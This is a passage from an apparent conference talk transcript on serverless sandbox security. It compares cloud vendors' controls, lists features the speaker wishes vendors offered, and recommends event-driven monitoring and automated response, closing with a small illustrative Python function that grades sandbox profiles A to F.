implement the controls I think are most important. None of them are strict about the language that's executing, and that's bad. Only some of them have read-only file systems. All of them, to their credit, do patch very frequently. AWS has the most granular IAM, and AWS is the only one where you can deploy functions that don't have internet egress. None of them have immutable environment variables, and that's not really the vendors' fault; that's just the way their operating systems work. So if you want to give something back to the world, give a PR to the Linux kernel that makes environment variables no longer writable. Sometimes I hear this is an impossible problem to solve. And almost all of them have some kind of warmness concept. So if I could ask the vendors to do things for me, in this magical world where I can get all of Amazon to deliver me a feature, what would I ask for? I would ask for any control that requires out-of-sandbox levels of access to implement. That would include things like native code signing protection: if I use PKI to sign my code, I don't want it to execute if it's not mine. I'd like immutable environment variables; I know it's hard, but you know, they have lots of employees. I'd like the ability to choose cold start in favor of security: that warmness capability we talked about is in favor of performance, and if I don't need it, I'd like to be able to turn it off, and maybe even pay less for that. I'd like the ability to automatically kill any process that's not executing in the language the runtime has selected. And I'd like more transparency in the patch cycle and the trade secrets of the runtime, because the more things I know as a consumer, the better choices I can make about the risk of running things in that environment. So should you use this? Probably. It's probably still better than startup-sized OpSec or something, and being able to lean on a vendor for this is still
good in most cases. But you can limit the blast radius of these attacks: you can use event-driven security in Amazon, like CloudWatch Events and CloudTrail, and automated response like the project I make, ThreatResponse. Remember that name: ThreatResponse, ThreatResponse, ThreatResponse. I make an automated IR pipeline for this stuff. So I'll leave you with this one last quote before I take a few questions: modern security does not resemble high walls or strong doors, but rather bells on strings that ring each time an attacker moves forward. All these people contributed to my project; there are actually a couple of people here today who contributed, my boss Jeff Bryner and Danny Hartnell from Mozilla, both contributors to this profiling project. I could never have done this alone; it was a ton of work. And also my co-presenter Graham Jones, who works for a Portland based company, LegitScript; he was my co-presenter at Black Hat, and he did the lion's share of the Azure research, so I've got to mention him. The vendors were really nice too, thank you to them. And now I'll take questions. I'll be in the hall, and I'm also running the CTF; come find me if you want to talk about general cloud stuff and things.
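As a closing illustration of the A-through-F grading idea mentioned for the Serverless Observatory: the check names, weights, and cutoffs below are made up for this sketch, not the project's real API; the talk only says the real scoring derives from the Docker CIS Benchmark.

```python
# Hypothetical controls and point values for grading a sandbox profile.
CHECKS = {
    "read_only_filesystem": 25,
    "no_internet_egress": 25,
    "strict_runtime_language": 25,
    "recently_patched_kernel": 25,
}

def grade(profile):
    """profile maps check name -> bool; returns an A-F letter grade."""
    score = sum(points for name, points in CHECKS.items() if profile.get(name))
    for cutoff, letter in ((90, "A"), (75, "B"), (60, "C"), (45, "D")):
        if score >= cutoff:
            return letter
    return "F"

print(grade({name: True for name in CHECKS}))  # prints "A"
```

The same shape works for any container environment: profile it, feed the booleans in, get a comparable grade back.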